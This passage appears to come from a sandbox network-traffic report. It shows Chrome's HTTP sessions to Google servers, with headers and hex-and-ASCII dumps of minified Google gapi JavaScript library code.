                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 72 72 6f 72 28 22 42 61 64 20 73 65 63 72 65 74 22 29 3b 74 68 69 73 2e 6c 3d 61 7d 3b 79 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 7d 3b 6e 65 77 20 79 28 22 61 62 6f 75 74 3a 62 6c 61 6e 6b 22 29 3b 6e 65 77 20 79 28 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 22 29 3b 76 61 72 20 41 3d 5b 5d 2c 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 41 20 55 52 4c 20 77 69 74 68 20 63 6f 6e 74 65 6e 74 20 27 22 2b 61 2b 22 27 20 77 61 73 20 73 61 6e 69 74 69 7a 65 64 20 61 77 61 79 2e 22 29 7d 3b 41 2e 69 6e 64 65 78 4f 66 28 44 29 3d 3d 3d 2d 31 26 26 41 2e 70 75 73 68 28 44 29 3b 2f 2a 0a 20 67 61 70 69 2e
                                                                                                                    Data Ascii: rror("Bad secret");this.l=a};y.prototype.toString=function(){return this.l};new y("about:blank");new y("about:invalid#zClosurez");var A=[],D=function(a){console.warn("A URL with content '"+a+"' was sanitized away.")};A.indexOf(D)===-1&&A.push(D);/* gapi.
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 6b 61 2c 22 5f 70 22 2c 49 28 29 29 2c 48 28 62 2c 63 2c 49 28 29 29 5b 61 5d 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2c 52 28 61 2c 22 5f 70 22 2c 63 29 29 7d 2c 6d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6a 6f 69 6e 28 22 5f 5f 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2e 2f 67 2c 22 5f 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2d 2f 67 2c 22 5f 22 29 2e 72 65 70 6c 61 63 65 28 2f 2c 2f 67 2c 22 5f 22 29 7d 3b 76 61 72 20 6e 61 3d 49 28 29 2c 55 3d 5b 5d 2c 56 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 42 61 64 20 68 69 6e 74 3a 20 22 2b 61 29 3b 7d 3b 55 2e 70 75 73 68 28 5b 22 6a 73 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 20 69 6e 20 61 29
                                                                                                                    Data Ascii: ka,"_p",I()),H(b,c,I())[a]=(new Date).getTime(),R(a,"_p",c))},ma=function(a){return a.join("__").replace(/\./g,"_").replace(/\-/g,"_").replace(/,/g,"_")};var na=I(),U=[],V=function(a){throw Error("Bad hint: "+a);};U.push(["jsl",function(a){for(var b in a)
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 2e 72 65 70 6c 61 63 65 28 2f 25 32 43 2f 67 2c 22 2c 22 29 7d 3b 72 65 74 75 72 6e 5b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 2e 70 61 74 68 50 72 65 66 69 78 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 43 2f 67 2c 0a 22 2c 22 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 46 2f 67 2c 22 2f 22 29 2c 22 2f 6b 3d 22 2c 65 28 61 2e 76 65 72 73 69 6f 6e 29 2c 22 2f 6d 3d 22 2c 65 28 62 29 2c 64 3f 22 2f 65 78 6d 3d 22 2b 65 28 64 29 3a 22 22 2c 22 2f 72 74 3d 6a 2f 73 76 3d 31 2f 64 3d 31 2f 65 64 3d 31 22 2c 61 2e 67 3f 22 2f 61 6d 3d 22 2b 65 28 61 2e 67 29 3a 22 22 2c 61 2e 69 3f 22 2f 72 73 3d 22 2b 65 28 61 2e 69 29 3a 22 22 2c 61 2e 6a 3f 22 2f 74 3d 22 2b 65 28 61 2e 6a 29 3a 22 22 2c 22 2f 63 62 3d 22 2c 65 28 63 29 5d 2e 6a 6f 69 6e 28 22 22
                                                                                                                    Data Ascii: .replace(/%2C/g,",")};return[encodeURIComponent(a.pathPrefix).replace(/%2C/g,",").replace(/%2F/g,"/"),"/k=",e(a.version),"/m=",e(b),d?"/exm="+e(d):"","/rt=j/sv=1/d=1/ed=1",a.g?"/am="+e(a.g):"",a.i?"/rs="+e(a.i):"",a.j?"/t="+e(a.j):"","/cb=",e(c)].join(""
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 61 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3b 69 66 28 66 3d 65 29 7b 61 3a 7b 66 6f 72 28 66 3d 30 3b 66 3c 62 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 69 66 28 62 5b 66 5d 3d 3d 3d 65 29 62 72 65 61 6b 20 61 3b 66 3d 2d 31 7d 66 3d 66 3c 30 7d 66 26 26 63 2e 70 75 73 68 28 65 29 7d 72 65 74 75 72 6e 20 63 7d 2c 43 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 4d 2e 6e 6f 6e 63 65 3b 72 65 74 75 72 6e 20 61 21 3d 3d 76 6f 69 64 20 30 3f 61 26 26 61 3d 3d 3d 53 74 72 69 6e 67 28 61 29 26 26 61 2e 6d 61 74 63 68 28 41 61 29 3f 61 3a 4d 2e 6e 6f 6e 63 65 3d 6e 75 6c 6c 3a 46 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 3f 28 61 3d 46 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d
                                                                                                                    Data Ascii: a.length;++d){var e=a[d],f;if(f=e){a:{for(f=0;f<b.length;f++)if(b[f]===e)break a;f=-1}f=f<0}f&&c.push(e)}return c},Ca=function(){var a=M.nonce;return a!==void 0?a&&a===String(a)&&a.match(Aa)?a:M.nonce=null:F.querySelector?(a=F.querySelector("script[nonce]
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 22 54 69 6d 65 6f 75 74 20 72 65 71 75 69 72 65 73 20 62 6f 74 68 20 74 68 65 20 74 69 6d 65 6f 75 74 20 70 61 72 61 6d 65 74 65 72 20 61 6e 64 20 6f 6e 74 69 6d 65 6f 75 74 20 70 61 72 61 6d 65 74 65 72 20 74 6f 20 62 65 20 73 65 74 22 3b 0a 6c 3d 48 28 4f 28 63 29 2c 22 72 22 2c 5b 5d 29 2e 73 6f 72 74 28 29 3b 76 61 72 20 47 3d 48 28 4f 28 63 29 2c 22 4c 22 2c 5b 5d 29 2e 73 6f 72 74 28 29 2c 4d 61 3d 4d 2e 6c 65 7c 7c 5b 5d 2c 4b 3d 5b 5d 2e 63 6f 6e 63 61 74 28 6c 29 2c 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 77 2c 42 29 7b 69 66 28 7a 29 72 65 74 75 72 6e 20 30 3b 45 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 71 29 3b 47 2e 70 75 73 68 2e 61 70 70 6c 79 28 47 2c 72 29 3b 76 61 72 20 43 3d 28 28 4a 7c 7c 7b 7d 29 2e 63 6f 6e 66 69 67 7c 7c 7b 7d 29 2e 75
                                                                                                                    Data Ascii: "Timeout requires both the timeout parameter and ontimeout parameter to be set";l=H(O(c),"r",[]).sort();var G=H(O(c),"L",[]).sort(),Ma=M.le||[],K=[].concat(l),la=function(w,B){if(z)return 0;E.clearTimeout(q);G.push.apply(G,r);var C=((J||{}).config||{}).u
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 62 21 3d 3d 22 22 7c 7c 21 61 2e 65 6e 64 73 57 69 74 68 28 22 2e 6a 73 22 29 7c 7c 28 61 3d 61 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 61 2e 6c 65 6e 67 74 68 2d 33 29 2c 62 3d 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2f 22 29 2b 31 2c 62 3e 3d 61 2e 6c 65 6e 67 74 68 7c 7c 28 61 3d 61 2e 73 75 62 73 74 72 28 62 29 2e 73 70 6c 69 74 28 22 3a 22 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 21 5b 22 61 70 69 22 2c 22 70 6c 61 74 66 6f 72 6d 22 5d 2e 69 6e 63 6c 75 64 65 73 28 64 29 7d 29 2c 63 2e 66 65 61 74 75 72 65 73 3d 61 29 29 7d 5d 29 3b 51 2e 62 73 30 3d 77 69 6e 64 6f 77 2e 67 61 70 69 2e 5f 62 73 7c 7c 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3b 52 28 22 62 73 30 22 29 3b 51 2e 62 73 31 3d
                                                                                                                    Data Ascii: b!==""||!a.endsWith(".js")||(a=a.substring(0,a.length-3),b=a.lastIndexOf("/")+1,b>=a.length||(a=a.substr(b).split(":").filter(function(d){return!["api","platform"].includes(d)}),c.features=a))}]);Q.bs0=window.gapi._bs||(new Date).getTime();R("bs0");Q.bs1=
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 69 78 3a 3a 73 65 3a 5f 2f 77 69 64 67 65 74 2f 70 6c 75 73 2f 63 69 72 63 6c 65 3f 75 73 65 67 61 70 69 3d 31 22 7d 2c 0a 70 6c 75 73 5f 73 68 61 72 65 3a 7b 70 61 72 61 6d 73 3a 7b 75 72 6c 3a 22 22 7d 2c 75 72 6c 3a 22 3a 73 6f 63 69 61 6c 68 6f 73 74 3a 2f 3a 73 65 73 73 69 6f 6e 5f 70 72 65 66 69 78 3a 3a 73 65 3a 5f 2f 2b 31 2f 73 68 61 72 65 62 75 74 74 6f 6e 3f 70 6c 75 73 53 68 61 72 65 3d 74 72 75 65 26 75 73 65 67 61 70 69 3d 31 22 7d 2c 72 62 72 5f 73 3a 7b 70 61 72 61 6d 73 3a 7b 75 72 6c 3a 22 22 7d 2c 75 72 6c 3a 22 3a 73 6f 63 69 61 6c 68 6f 73 74 3a 2f 3a 73 65 73 73 69 6f 6e 5f 70 72 65 66 69 78 3a 3a 73 65 3a 5f 2f 77 69 64 67 65 74 2f 72 65 6e 64 65 72 2f 72 65 63 6f 62 61 72 73 69 6d 70 6c 65 73 63 72 6f 6c 6c 65 72 22 7d 2c 22 3a 73
                                                                                                                    Data Ascii: ix::se:_/widget/plus/circle?usegapi=1"},plus_share:{params:{url:""},url:":socialhost:/:session_prefix::se:_/+1/sharebutton?plusShare=true&usegapi=1"},rbr_s:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/render/recobarsimplescroller"},":s
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 61 6d 73 3a 7b 75 72 6c 3a 22 22 7d 2c 75 72 6c 3a 22 3a 73 6f 63 69 61 6c 68 6f 73 74 3a 2f 3a 73 65 73 73 69 6f 6e 5f 70 72 65 66 69 78 3a 3a 73 65 3a 5f 2f 77 69 64 67 65 74 2f 72 65 6e 64 65 72 2f 72 65 63 6f 62 61 72 69 6e 76 69 74 61 74 69 6f 6e 22 7d 2c 73 68 61 72 65 3a 7b 75 72 6c 3a 22 3a 73 6f 63 69 61 6c 68 6f 73 74 3a 2f 3a 73 65 73 73 69 6f 6e 5f 70 72 65 66 69 78 3a 3a 69 6d 5f 70 72 65 66 69 78 3a 5f 2f 77 69 64 67 65 74 2f 72 65 6e 64 65 72 2f 73 68 61 72 65 3f 75 73 65 67 61 70 69 3d 31 22 7d 2c 70 6c 75 73 6f 6e 65 3a 7b 70 61 72 61 6d 73 3a 7b 63 6f 75 6e 74 3a 22 22 2c 0a 73 69 7a 65 3a 22 22 2c 75 72 6c 3a 22 22 7d 2c 75 72 6c 3a 22 3a 73 6f 63 69 61 6c 68 6f 73 74 3a 2f 3a 73 65 73 73 69 6f 6e 5f 70 72 65 66 69 78 3a 3a 73 65 3a 5f
                                                                                                                    Data Ascii: ams:{url:""},url:":socialhost:/:session_prefix::se:_/widget/render/recobarinvitation"},share:{url:":socialhost:/:session_prefix::im_prefix:_/widget/render/share?usegapi=1"},plusone:{params:{count:"",size:"",url:""},url:":socialhost:/:session_prefix::se:_


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449769172.217.19.2064432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:23 UTC543OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                    Host: play.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    Accept: */*
                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                    Access-Control-Request-Headers: x-goog-authuser
                                                                                                                    Origin: https://sites.google.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Referer: https://sites.google.com/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:24 UTC517INHTTP/1.1 200 OK
                                                                                                                    Access-Control-Allow-Origin: https://sites.google.com
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Max-Age: 86400
                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                    Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:24 GMT
                                                                                                                    Server: Playlog
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449773142.250.181.784432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:24 UTC784OUTGET /_/scs/abc-static/_/js/k=gapi.lb.en.6zM9SN8ON8Q.O/m=client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo9LiInNUyZ6A99oK9HdmPXGee7Zyg/cb=gapi.loaded_0?le=scs HTTP/1.1
                                                                                                                    Host: apis.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: */*
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: NID=519=gdyYGrV8wKESt6T7PJLfWqt4Fh4r5I8B97r0VfkrSsZYkNs9vowLpX0djHp_EkSdUswtFE_sLpxHs7b6849m7NndCgLPAVG8HqCcH_dihgE4Hhscjgw_FuB7NL3gBhSStO8oWnVObBaYEPOp3WCdhOe5I9Pgs_3PCmwsXD9O8mEyNYNyWCgb8nxu
                                                                                                                    2024-11-25 18:52:25 UTC916INHTTP/1.1 200 OK
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                    Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                    Content-Length: 321092
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Server: sffe
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Date: Thu, 21 Nov 2024 11:54:29 GMT
                                                                                                                    Expires: Fri, 21 Nov 2025 11:54:29 GMT
                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                    Last-Modified: Mon, 11 Nov 2024 18:50:50 GMT
                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Age: 370676
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2024-11-25 18:52:25 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 32 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 61 61 2c 62 61 2c 66 61 2c 6d 61 2c 6e 61 2c 72 61 2c 73 61 2c 75 61 3b 61 61 3d 66 75 6e
                                                                                                                    Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x200000, ]);var aa,ba,fa,ma,na,ra,sa,ua;aa=fun
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20
                                                                                                                    Data Ascii: rn a;a[b]=c.value;return a};fa=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 61 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 73 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74
                                                                                                                    Data Ascii: defined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:aa(a)};throw Error("b`"+String(a));};ra=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};sa=typeof Object.assign=="function"?Object
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 30 3b 74 68 69 73 2e 4b 72 3d 5b 5d 3b 74 68 69 73 2e 58 55 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 61 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 4d 64 61 29 2c 72 65 6a 65 63 74 3a 68 28 74 68 69 73 2e 48 4a 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4d 64 61 3d 66 75 6e 63 74
                                                                                                                    Data Ascii: 0;this.Kr=[];this.XU=!1;var k=this.aF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.aF=function(){function h(m){return function(n){l||(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Mda),reject:h(this.HJ)}};e.prototype.Mda=funct
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 6f 74 6f 74 79 70 65 2e 79 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4b 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4b 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 4d 4f 28 74 68 69 73 2e 4b 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4b 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 74 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 61 46 28 29 3b 68 2e 5a 78 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 75 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 74 68 69 73 2e 61 46 28 29 3b 74 72 79 7b 68 2e 63 61 6c 6c 28 6b 2c 6c 2e 72 65 73 6f 6c 76
                                                                                                                    Data Ascii: ototype.y7=function(){if(this.Kr!=null){for(var h=0;h<this.Kr.length;++h)f.MO(this.Kr[h]);this.Kr=null}};var f=new b;e.prototype.tfa=function(h){var k=this.aF();h.Zx(k.resolve,k.reject)};e.prototype.ufa=function(h,k){var l=this.aF();try{h.call(k,l.resolv
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6d 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 42 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 66 26 26 63 3c 65 3b 29 69 66 28 64 5b 63 2b 2b 5d 21 3d 62 5b 68 2b 2b 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 68 3e 3d 66 7d
                                                                                                                    Data Ascii: regular expression");return a+""};ma("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ba(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));for(var h=0;h<f&&c<e;)if(d[c++]!=b[h++])return!1;return h>=f}
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 72 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 72 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3a 76 6f 69
                                                                                                                    Data Ascii: a(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!ra(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return this};k.prototype.get=function(l){return c(l)&&ra(l,f)?l[f][this.Ga]:voi
                                                                                                                    2024-11-25 18:52:25 UTC1390INData Raw: 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 58 65 2e 50 6b 2e 6e 65 78 74 3d 6b 2e 58 65 2e 6e 65 78 74 2c 6b 2e 58 65 2e 6e 65 78 74 2e 50 6b 3d 0a 6b 2e 58 65 2e 50 6b 2c 6b 2e 58 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 50 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 58 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e
